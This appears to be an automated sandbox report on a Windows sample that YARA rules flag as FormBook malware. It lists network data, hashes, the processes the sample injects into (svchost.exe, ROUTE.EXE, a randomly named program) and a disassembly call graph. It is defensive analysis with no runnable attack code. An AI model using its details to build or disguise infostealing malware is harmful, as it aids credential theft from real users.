                                                          Data Ascii: bdi02je=zpgu76N3IzQrmj5ssVlIpww81fxdko2m9SFGJnyL2nnpvviUm8rBMQS79e8GafWVScRrULjQvetW/RtbzyBAQNrBryjoVSzaTAyNDg5/rYvVIqfAyHHXFGgw8FsKcUvVui5yPbQAsCGzI6cMknyVD56YSdx6g8ymHjunD/uxevmUM6xo7jA4aAGfRlc1iReTStfGqweo9mXTfWbCtVYzUzdz3nu04gnEOucnujdRfGgzsgjbalY+Mchou4Rag3gKXh9YagzjjfYatIUSFdtfBkW8aDEvfDU+d6zDEdmT3zhiUAaVC6u6nWDhhVZbLo92mVnJoKtLaf7EgMSFQlMo35rzIt3sxerp8FfVKx2yDqhHukAw4w599FcebX4pzLGhaAYNQ+a2MScqgaj0q5d/1D0R49b4cXqYfEXMuiBzZTG3zLUFRSCbMVVCZG6fTMKgfqrZEKfvpTUy0beZ5VPkMCwwtQWovqOp9YbtU9YVhBaGqxvgHA2YRC2exMSk5JG51epNjL3VuNGfG6X45CldnXqFRoUUFukw5HJ1ch9wWUYGaLJfOg/lT5H9oCM6gfoNlgMvBG5YR4fDJuI0eCqnlzBAx7yerKx0WjMXAm4ZrbGp0agTaYaSWRWqK1IkaHAseODMTe8kB4zXQ5Wa/eQS89OO4omPZhpbtLXJHXlKm7H8hfQOLk2vID5lLTtIgnrgm1f8jqtEJa/PLbfqVbZMlKZVIOPRKJ2+jLse/EjbXz0XrsjtfWXHMekaDXX2pbsGN/yGbIfu/Sl3BzSPQ6YUMQyHR8NXa6q/PLMyO3Cg/3VOqrD8yTwJBDePImXhuldPZKOaSVTdyjzDxeu/c4pEG09cjiYEemY2rxQ+5E84fBarFsuWeUtHoDf5QmqzNZiW8nYOrlUpoOfXw9DURwOrpi3Jurd/Iw2p2Wv+og2CrCppNfT58ITbcG50pis0d/fP0On9q5dJ0FvkMiygkj8/fI6vOe+YjuK+9foZX13Ba25p [TRUNCATED]
                                                          Jan 10, 2025 23:07:59.239759922 CET605INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:59 GMT
                                                          Server: Apache
                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:17:04:51
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\gH3LlhcRzg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\gH3LlhcRzg.exe"
                                                          Imagebase:0xcd0000
                                                          File size:1'187'328 bytes
                                                          MD5 hash:A238864F937038D6FE39092719A1EFF0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:17:04:52
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\gH3LlhcRzg.exe"
                                                          Imagebase:0x740000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1711994414.00000000069E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1711288888.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1716772538.00000000088D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:17:05:17
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe"
                                                          Imagebase:0x7a0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3227680610.0000000005F40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:7
                                                          Start time:17:05:19
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\ROUTE.EXE"
                                                          Imagebase:0x980000
                                                          File size:19'456 bytes
                                                          MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3226300583.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3225975390.0000000000720000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3227836129.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:8
                                                          Start time:17:05:32
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe"
                                                          Imagebase:0x7a0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3229916982.0000000005130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:11
                                                          Start time:17:05:44
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff73feb0000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:3.3%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:7.6%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:155
                                                            execution_graph 104004 cd107d 104009 cd708b 104004->104009 104006 cd108c 104040 cf2d40 104006->104040 104010 cd709b __write_nolock 104009->104010 104043 cd7667 104010->104043 104014 cd715a 104055 cf050b 104014->104055 104021 cd7667 59 API calls 104022 cd718b 104021->104022 104074 cd7d8c 104022->104074 104024 cd7194 RegOpenKeyExW 104025 d0e8b1 RegQueryValueExW 104024->104025 104028 cd71b6 Mailbox 104024->104028 104026 d0e943 RegCloseKey 104025->104026 104027 d0e8ce 104025->104027 104026->104028 104039 d0e955 _wcscat Mailbox __NMSG_WRITE 104026->104039 104078 cf0db6 104027->104078 104028->104006 104030 d0e8e7 104088 cd522e 104030->104088 104031 cd79f2 59 API calls 104031->104039 104034 d0e90f 104091 cd7bcc 104034->104091 104036 d0e929 104036->104026 104038 cd3f74 59 API calls 104038->104039 104039->104028 104039->104031 104039->104038 104100 cd7de1 104039->104100 104165 cf2c44 104040->104165 104042 cd1096 104044 cf0db6 Mailbox 59 API calls 104043->104044 104045 cd7688 104044->104045 104046 cf0db6 Mailbox 59 API calls 104045->104046 104047 cd7151 104046->104047 104048 cd4706 104047->104048 104104 d01940 104048->104104 104051 cd7de1 59 API calls 104052 cd4739 104051->104052 104106 cd4750 104052->104106 104054 cd4743 Mailbox 104054->104014 104056 d01940 __write_nolock 104055->104056 104057 cf0518 GetFullPathNameW 104056->104057 104058 cf053a 104057->104058 104059 cd7bcc 59 API calls 104058->104059 104060 cd7165 104059->104060 104061 cd7cab 104060->104061 104062 cd7cbf 104061->104062 104063 d0ed4a 104061->104063 104128 cd7c50 104062->104128 104133 cd8029 104063->104133 104066 cd7173 104068 cd3f74 104066->104068 104067 d0ed55 __NMSG_WRITE _memmove 104069 cd3f82 104068->104069 104073 cd3fa4 _memmove 104068->104073 104071 cf0db6 Mailbox 59 API calls 104069->104071 104070 cf0db6 Mailbox 59 API calls 104072 cd3fb8 104070->104072 104071->104073 104072->104021 104073->104070 104075 cd7d99 104074->104075 104076 cd7da6 104074->104076 104075->104024 104077 cf0db6 Mailbox 59 API calls 104076->104077 104077->104075 104080 cf0dbe 104078->104080 104081 cf0dd8 104080->104081 104083 cf0ddc std::exception::exception 104080->104083 104136 cf571c 104080->104136 104153 cf33a1 DecodePointer 104080->104153 104081->104030 104154 cf859b RaiseException 104083->104154 104085 cf0e06 104155 cf84d1 58 API calls _free 104085->104155 104087 cf0e18 104087->104030 104089 cf0db6 Mailbox 59 API calls 104088->104089 104090 cd5240 RegQueryValueExW 104089->104090 104090->104034 104090->104036 104092 cd7c45 104091->104092 104094 cd7bd8 __NMSG_WRITE 104091->104094 104093 cd7d2c 59 API calls 104092->104093 104099 cd7bf6 _memmove 104093->104099 104095 cd7bee 104094->104095 104096 cd7c13 104094->104096 104164 cd7f27 59 API calls Mailbox 104095->104164 104098 cd8029 59 API calls 104096->104098 104098->104099 104099->104036 104101 cd7df0 __NMSG_WRITE _memmove 104100->104101 104102 cf0db6 Mailbox 59 API calls 104101->104102 104103 cd7e2e 104102->104103 104103->104039 104105 cd4713 GetModuleFileNameW 104104->104105 104105->104051 104107 d01940 __write_nolock 104106->104107 104108 cd475d GetFullPathNameW 104107->104108 104109 cd477c 104108->104109 104110 cd4799 104108->104110 104112 cd7bcc 59 API calls 104109->104112 104111 cd7d8c 59 API calls 104110->104111 104113 cd4788 104111->104113 104112->104113 104116 cd7726 104113->104116 104117 cd7734 104116->104117 104120 cd7d2c 104117->104120 104119 cd4794 104119->104054 104121 cd7d3a 104120->104121 104123 cd7d43 _memmove 104120->104123 104121->104123 104124 cd7e4f 104121->104124 104123->104119 104125 cd7e5f _memmove 104124->104125 104126 cd7e62 104124->104126 104125->104123 104127 cf0db6 Mailbox 59 API calls 104126->104127 104127->104125 104129 cd7c5f __NMSG_WRITE 104128->104129 104130 cd8029 59 API calls 104129->104130 104131 cd7c70 _memmove 104129->104131 104132 d0ed07 _memmove 104130->104132 104131->104066 104134 cf0db6 Mailbox 59 API calls 104133->104134 104135 cd8033 104134->104135 104135->104067 104137 cf5797 104136->104137 104142 cf5728 104136->104142 104162 cf33a1 DecodePointer 104137->104162 104139 cf5733 104139->104142 104156 cfa16b 58 API calls __NMSG_WRITE 104139->104156 104157 cfa1c8 58 API calls 5 library calls 104139->104157 104158 cf309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104139->104158 104140 cf579d 104163 cf8b28 58 API calls __getptd_noexit 104140->104163 104142->104139 104144 cf575b RtlAllocateHeap 104142->104144 104147 cf5783 104142->104147 104151 cf5781 104142->104151 104159 cf33a1 DecodePointer 104142->104159 104144->104142 104146 cf578f 104144->104146 104146->104080 104160 cf8b28 58 API calls __getptd_noexit 104147->104160 104161 cf8b28 58 API calls __getptd_noexit 104151->104161 104153->104080 104154->104085 104155->104087 104156->104139 104157->104139 104159->104142 104160->104151 104161->104146 104162->104140 104163->104146 104164->104099 104166 cf2c50 __tzset_nolock 104165->104166 104173 cf3217 104166->104173 104172 cf2c77 __tzset_nolock 104172->104042 104190 cf9c0b 104173->104190 104175 cf2c59 104176 cf2c88 DecodePointer DecodePointer 104175->104176 104177 cf2c65 104176->104177 104178 cf2cb5 104176->104178 104187 cf2c82 104177->104187 104178->104177 104236 cf87a4 59 API calls wcstoxq 104178->104236 104180 cf2d18 EncodePointer EncodePointer 104180->104177 104181 cf2cc7 104181->104180 104182 cf2cec 104181->104182 104237 cf8864 61 API calls 2 library calls 104181->104237 104182->104177 104185 cf2d06 EncodePointer 104182->104185 104238 cf8864 61 API calls 2 library calls 104182->104238 104185->104180 104186 cf2d00 104186->104177 104186->104185 104239 cf3220 104187->104239 104191 cf9c2f EnterCriticalSection 104190->104191 104192 cf9c1c 104190->104192 104191->104175 104197 cf9c93 104192->104197 104194 cf9c22 104194->104191 104221 cf30b5 58 API calls 3 library calls 104194->104221 104198 cf9c9f __tzset_nolock 104197->104198 104199 cf9ca8 104198->104199 104200 cf9cc0 104198->104200 104222 cfa16b 58 API calls __NMSG_WRITE 104199->104222 104208 cf9ce1 __tzset_nolock 104200->104208 104225 cf881d 58 API calls 2 library calls 104200->104225 104203 cf9cad 104223 cfa1c8 58 API calls 5 library calls 104203->104223 104204 cf9cd5 104206 cf9cdc 104204->104206 104207 cf9ceb 104204->104207 104226 cf8b28 58 API calls __getptd_noexit 104206->104226 104211 cf9c0b __lock 58 API calls 104207->104211 104208->104194 104209 cf9cb4 104224 cf309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104209->104224 104213 cf9cf2 104211->104213 104215 cf9cff 104213->104215 104216 cf9d17 104213->104216 104227 cf9e2b InitializeCriticalSectionAndSpinCount 104215->104227 104228 cf2d55 104216->104228 104219 cf9d0b 104234 cf9d33 LeaveCriticalSection _doexit 104219->104234 104222->104203 104223->104209 104225->104204 104226->104208 104227->104219 104229 cf2d5e RtlFreeHeap 104228->104229 104233 cf2d87 __dosmaperr 104228->104233 104230 cf2d73 104229->104230 104229->104233 104235 cf8b28 58 API calls __getptd_noexit 104230->104235 104232 cf2d79 GetLastError 104232->104233 104233->104219 104234->104208 104235->104232 104236->104181 104237->104182 104238->104186 104242 cf9d75 LeaveCriticalSection 104239->104242 104241 cf2c87 104241->104172 104242->104241 104243 cd1055 104248 cd2649 104243->104248 104246 cf2d40 __cinit 67 API calls 104247 cd1064 104246->104247 104249 cd7667 59 API calls 104248->104249 104250 cd26b7 104249->104250 104255 cd3582 104250->104255 104253 cd2754 104254 cd105a 104253->104254 104258 cd3416 59 API calls 2 library calls 104253->104258 104254->104246 104259 cd35b0 104255->104259 104258->104253 104260 cd35bd 104259->104260 104261 cd35a1 104259->104261 104260->104261 104262 cd35c4 RegOpenKeyExW 104260->104262 104261->104253 104262->104261 104263 cd35de RegQueryValueExW 104262->104263 104264 cd35ff 104263->104264 104265 cd3614 RegCloseKey 104263->104265 104264->104265 104265->104261 104266 cf7c56 104267 cf7c62 __tzset_nolock 104266->104267 104303 cf9e08 GetStartupInfoW 104267->104303 104269 cf7c67 104305 cf8b7c GetProcessHeap 104269->104305 104271 cf7cbf 104272 cf7cca 104271->104272 104388 cf7da6 58 API calls 3 library calls 104271->104388 104306 cf9ae6 104272->104306 104275 cf7cd0 104276 cf7cdb __RTC_Initialize 104275->104276 104389 cf7da6 58 API calls 3 library calls 104275->104389 104327 cfd5d2 104276->104327 104279 cf7cea 104280 cf7cf6 GetCommandLineW 104279->104280 104390 cf7da6 58 API calls 3 library calls 104279->104390 104346 d04f23 GetEnvironmentStringsW 104280->104346 104283 cf7cf5 104283->104280 104286 cf7d10 104287 cf7d1b 104286->104287 104391 cf30b5 58 API calls 3 library calls 104286->104391 104356 d04d58 104287->104356 104290 cf7d21 104291 cf7d2c 104290->104291 104392 cf30b5 58 API calls 3 library calls 104290->104392 104370 cf30ef 104291->104370 104294 cf7d34 104296 cf7d3f __wwincmdln 104294->104296 104393 cf30b5 58 API calls 3 library calls 104294->104393 104376 cd47d0 104296->104376 104298 cf7d53 104299 cf7d62 104298->104299 104394 cf3358 58 API calls _doexit 104298->104394 104395 cf30e0 58 API calls _doexit 104299->104395 104302 cf7d67 __tzset_nolock 104304 cf9e1e 104303->104304 104304->104269 104305->104271 104396 cf3187 36 API calls 2 library calls 104306->104396 104308 cf9aeb 104397 cf9d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 104308->104397 104310 cf9af0 104311 cf9af4 104310->104311 104399 cf9d8a TlsAlloc 104310->104399 104398 cf9b5c 61 API calls 2 library calls 104311->104398 104314 cf9af9 104314->104275 104315 cf9b06 104315->104311 104316 cf9b11 104315->104316 104400 cf87d5 104316->104400 104319 cf9b53 104408 cf9b5c 61 API calls 2 library calls 104319->104408 104322 cf9b58 104322->104275 104323 cf9b32 104323->104319 104324 cf9b38 104323->104324 104407 cf9a33 58 API calls 4 library calls 104324->104407 104326 cf9b40 GetCurrentThreadId 104326->104275 104328 cfd5de __tzset_nolock 104327->104328 104329 cf9c0b __lock 58 API calls 104328->104329 104330 cfd5e5 104329->104330 104331 cf87d5 __calloc_crt 58 API calls 104330->104331 104333 cfd5f6 104331->104333 104332 cfd661 GetStartupInfoW 104336 cfd7a5 104332->104336 104337 cfd676 104332->104337 104333->104332 104334 cfd601 __tzset_nolock @_EH4_CallFilterFunc@8 104333->104334 104334->104279 104335 cfd86d 104422 cfd87d LeaveCriticalSection _doexit 104335->104422 104336->104335 104340 cfd7f2 GetStdHandle 104336->104340 104342 cfd805 GetFileType 104336->104342 104421 cf9e2b InitializeCriticalSectionAndSpinCount 104336->104421 104337->104336 104339 cf87d5 __calloc_crt 58 API calls 104337->104339 104341 cfd6c4 104337->104341 104339->104337 104340->104336 104341->104336 104343 cfd6f8 GetFileType 104341->104343 104420 cf9e2b InitializeCriticalSectionAndSpinCount 104341->104420 104342->104336 104343->104341 104347 cf7d06 104346->104347 104348 d04f34 104346->104348 104352 d04b1b GetModuleFileNameW 104347->104352 104423 cf881d 58 API calls 2 library calls 104348->104423 104350 d04f5a _memmove 104351 d04f70 FreeEnvironmentStringsW 104350->104351 104351->104347 104353 d04b4f _wparse_cmdline 104352->104353 104355 d04b8f _wparse_cmdline 104353->104355 104424 cf881d 58 API calls 2 library calls 104353->104424 104355->104286 104357 d04d71 __NMSG_WRITE 104356->104357 104361 d04d69 104356->104361 104358 cf87d5 __calloc_crt 58 API calls 104357->104358 104366 d04d9a __NMSG_WRITE 104358->104366 104359 d04df1 104360 cf2d55 _free 58 API calls 104359->104360 104360->104361 104361->104290 104362 cf87d5 __calloc_crt 58 API calls 104362->104366 104363 d04e16 104365 cf2d55 _free 58 API calls 104363->104365 104365->104361 104366->104359 104366->104361 104366->104362 104366->104363 104367 d04e2d 104366->104367 104425 d04607 58 API calls wcstoxq 104366->104425 104426 cf8dc6 IsProcessorFeaturePresent 104367->104426 104369 d04e39 104369->104290 104373 cf30fb __IsNonwritableInCurrentImage 104370->104373 104372 cf3119 __initterm_e 104374 cf2d40 __cinit 67 API calls 104372->104374 104375 cf3138 _doexit __IsNonwritableInCurrentImage 104372->104375 104449 cfa4d1 104373->104449 104374->104375 104375->104294 104377 cd47ea 104376->104377 104387 cd4889 104376->104387 104378 cd4824 IsThemeActive 104377->104378 104452 cf336c 104378->104452 104382 cd4850 104464 cd48fd SystemParametersInfoW SystemParametersInfoW 104382->104464 104384 cd485c 104465 cd3b3a 104384->104465 104386 cd4864 SystemParametersInfoW 104386->104387 104387->104298 104388->104272 104389->104276 104390->104283 104394->104299 104395->104302 104396->104308 104397->104310 104398->104314 104399->104315 104403 cf87dc 104400->104403 104402 cf8817 104402->104319 104406 cf9de6 TlsSetValue 104402->104406 104403->104402 104405 cf87fa 104403->104405 104409 d051f6 104403->104409 104405->104402 104405->104403 104417 cfa132 Sleep 104405->104417 104406->104323 104407->104326 104408->104322 104410 d05201 104409->104410 104415 d0521c 104409->104415 104411 d0520d 104410->104411 104410->104415 104418 cf8b28 58 API calls __getptd_noexit 104411->104418 104413 d0522c HeapAlloc 104414 d05212 104413->104414 104413->104415 104414->104403 104415->104413 104415->104414 104419 cf33a1 DecodePointer 104415->104419 104417->104405 104418->104414 104419->104415 104420->104341 104421->104336 104422->104334 104423->104350 104424->104355 104425->104366 104427 cf8dd1 104426->104427 104432 cf8c59 104427->104432 104431 cf8dec 104431->104369 104433 cf8c73 _memset __call_reportfault 104432->104433 104434 cf8c93 IsDebuggerPresent 104433->104434 104440 cfa155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104434->104440 104437 cf8d7a 104439 cfa140 GetCurrentProcess TerminateProcess 104437->104439 104438 cf8d57 __call_reportfault 104441 cfc5f6 104438->104441 104439->104431 104440->104438 104442 cfc5fe 104441->104442 104443 cfc600 IsProcessorFeaturePresent 104441->104443 104442->104437 104445 d0590a 104443->104445 104448 d058b9 5 API calls 2 library calls 104445->104448 104447 d059ed 104447->104437 104448->104447 104450 cfa4d4 EncodePointer 104449->104450 104450->104450 104451 cfa4ee 104450->104451 104451->104372 104453 cf9c0b __lock 58 API calls 104452->104453 104454 cf3377 DecodePointer EncodePointer 104453->104454 104517 cf9d75 LeaveCriticalSection 104454->104517 104456 cd4849 104457 cf33d4 104456->104457 104458 cf33de 104457->104458 104459 cf33f8 104457->104459 104458->104459 104518 cf8b28 58 API calls __getptd_noexit 104458->104518 104459->104382 104461 cf33e8 104519 cf8db6 9 API calls wcstoxq 104461->104519 104463 cf33f3 104463->104382 104464->104384 104466 cd3b47 __write_nolock 104465->104466 104467 cd7667 59 API calls 104466->104467 104468 cd3b51 GetCurrentDirectoryW 104467->104468 104520 cd3766 104468->104520 104470 cd3b7a IsDebuggerPresent 104471 d0d272 MessageBoxA 104470->104471 104472 cd3b88 104470->104472 104474 d0d28c 104471->104474 104472->104474 104475 cd3ba5 104472->104475 104504 cd3c61 104472->104504 104473 cd3c68 SetCurrentDirectoryW 104480 cd3c75 Mailbox 104473->104480 104730 cd7213 59 API calls Mailbox 104474->104730 104601 cd7285 104475->104601 104479 cd3bc3 GetFullPathNameW 104482 cd7bcc 59 API calls 104479->104482 104480->104386 104481 d0d29c 104484 d0d2b2 SetCurrentDirectoryW 104481->104484 104483 cd3bfe 104482->104483 104617 ce092d 104483->104617 104484->104480 104487 cd3c1c 104488 cd3c26 104487->104488 104731 d2874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104487->104731 104633 cd3a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104488->104633 104491 d0d2cf 104491->104488 104495 d0d2e0 104491->104495 104494 cd3c30 104496 cd3c43 104494->104496 104641 cd434a 104494->104641 104497 cd4706 61 API calls 104495->104497 104652 ce09d0 104496->104652 104498 d0d2e8 104497->104498 104501 cd7de1 59 API calls 104498->104501 104503 d0d2f5 104501->104503 104502 cd3c4e 104502->104504 104729 cd443a Shell_NotifyIconW _memset 104502->104729 104505 d0d324 104503->104505 104506 d0d2ff 104503->104506 104504->104473 104509 cd7cab 59 API calls 104505->104509 104508 cd7cab 59 API calls 104506->104508 104510 d0d30a 104508->104510 104511 d0d320 GetForegroundWindow ShellExecuteW 104509->104511 104732 cd7b2e 104510->104732 104515 d0d354 Mailbox 104511->104515 104515->104504 104516 cd7cab 59 API calls 104516->104511 104517->104456 104518->104461 104519->104463 104521 cd7667 59 API calls 104520->104521 104522 cd377c 104521->104522 104741 cd3d31 104522->104741 104524 cd379a 104525 cd4706 61 API calls 104524->104525 104526 cd37ae 104525->104526 104527 cd7de1 59 API calls 104526->104527 104528 cd37bb 104527->104528 104755 cd4ddd 104528->104755 104531 cd37dc Mailbox 104779 cd8047 104531->104779 104532 d0d173 104826 d3955b 104532->104826 104535 d0d192 104538 cf2d55 _free 58 API calls 104535->104538 104540 d0d19f 104538->104540 104542 cd4e4a 84 API calls 104540->104542 104544 d0d1a8 104542->104544 104548 cd3ed0 59 API calls 104544->104548 104545 cd7de1 59 API calls 104546 cd3808 104545->104546 104786 cd84c0 104546->104786 104550 d0d1c3 104548->104550 104549 cd381a Mailbox 104551 cd7de1 59 API calls 104549->104551 104552 cd3ed0 59 API calls 104550->104552 104553 cd3840 104551->104553 104554 d0d1df 104552->104554 104555 cd84c0 69 API calls 104553->104555 104556 cd4706 61 API calls 104554->104556 104558 cd384f Mailbox 104555->104558 104557 d0d204 104556->104557 104559 cd3ed0 59 API calls 104557->104559 104561 cd7667 59 API calls 104558->104561 104560 d0d210 104559->104560 104562 cd8047 59 API calls 104560->104562 104563 cd386d 104561->104563 104564 d0d21e 104562->104564 104790 cd3ed0 104563->104790 104566 cd3ed0 59 API calls 104564->104566 104569 d0d22d 104566->104569 104574 cd8047 59 API calls 104569->104574 104570 cd3887 104570->104544 104571 cd3891 104570->104571 104572 cf2efd _W_store_winword 60 API calls 104571->104572 104573 cd389c 104572->104573 104573->104550 104575 cd38a6 104573->104575 104576 d0d24f 104574->104576 104577 cf2efd _W_store_winword 60 API calls 104575->104577 104578 cd3ed0 59 API calls 104576->104578 104579 cd38b1 104577->104579 104580 d0d25c 104578->104580 104579->104554 104581 cd38bb 104579->104581 104580->104580 104582 cf2efd _W_store_winword 60 API calls 104581->104582 104583 cd38c6 104582->104583 104583->104569 104584 cd3907 104583->104584 104586 cd3ed0 59 API calls 104583->104586 104584->104569 104585 cd3914 104584->104585 104806 cd92ce 104585->104806 104588 cd38ea 104586->104588 104590 cd8047 59 API calls 104588->104590 104591 cd38f8 104590->104591 104593 cd3ed0 59 API calls 104591->104593 104593->104584 104596 cd928a 59 API calls 104598 cd394f 104596->104598 104597 cd8ee0 60 API calls 104597->104598 104598->104596 104598->104597 104599 cd3ed0 59 API calls 104598->104599 104600 cd3995 Mailbox 104598->104600 104599->104598 104600->104470 104602 cd7292 __write_nolock 104601->104602 104603 d0ea22 _memset 104602->104603 104604 cd72ab 104602->104604 104607 d0ea3e GetOpenFileNameW 104603->104607 104605 cd4750 60 API calls 104604->104605 104606 cd72b4 104605->104606 105446 cf0791 104606->105446 104609 d0ea8d 104607->104609 104610 cd7bcc 59 API calls 104609->104610 104612 d0eaa2 104610->104612 104612->104612 104614 cd72c9 105464 cd686a 104614->105464 104618 ce093a __write_nolock 104617->104618 105716 cd6d80 104618->105716 104620 ce093f 104621 cd3c14 104620->104621 105727 ce119e 89 API calls 104620->105727 104621->104481 104621->104487 104623 ce094c 104623->104621 105728 ce3ee7 91 API calls Mailbox 104623->105728 104625 ce0955 104625->104621 104626 ce0959 GetFullPathNameW 104625->104626 104627 cd7bcc 59 API calls 104626->104627 104628 ce0985 104627->104628 104629 cd7bcc 59 API calls 104628->104629 104630 ce0992 104629->104630 104631 d14cab _wcscat 104630->104631 104632 cd7bcc 59 API calls 104630->104632 104632->104621 104634 d0d261 104633->104634 104635 cd3ab0 LoadImageW RegisterClassExW 104633->104635 105767 cd47a0 LoadImageW EnumResourceNamesW 104634->105767 105766 cd3041 7 API calls 104635->105766 104638 d0d26a 104639 cd3b34 104640 cd39d5 CreateWindowExW 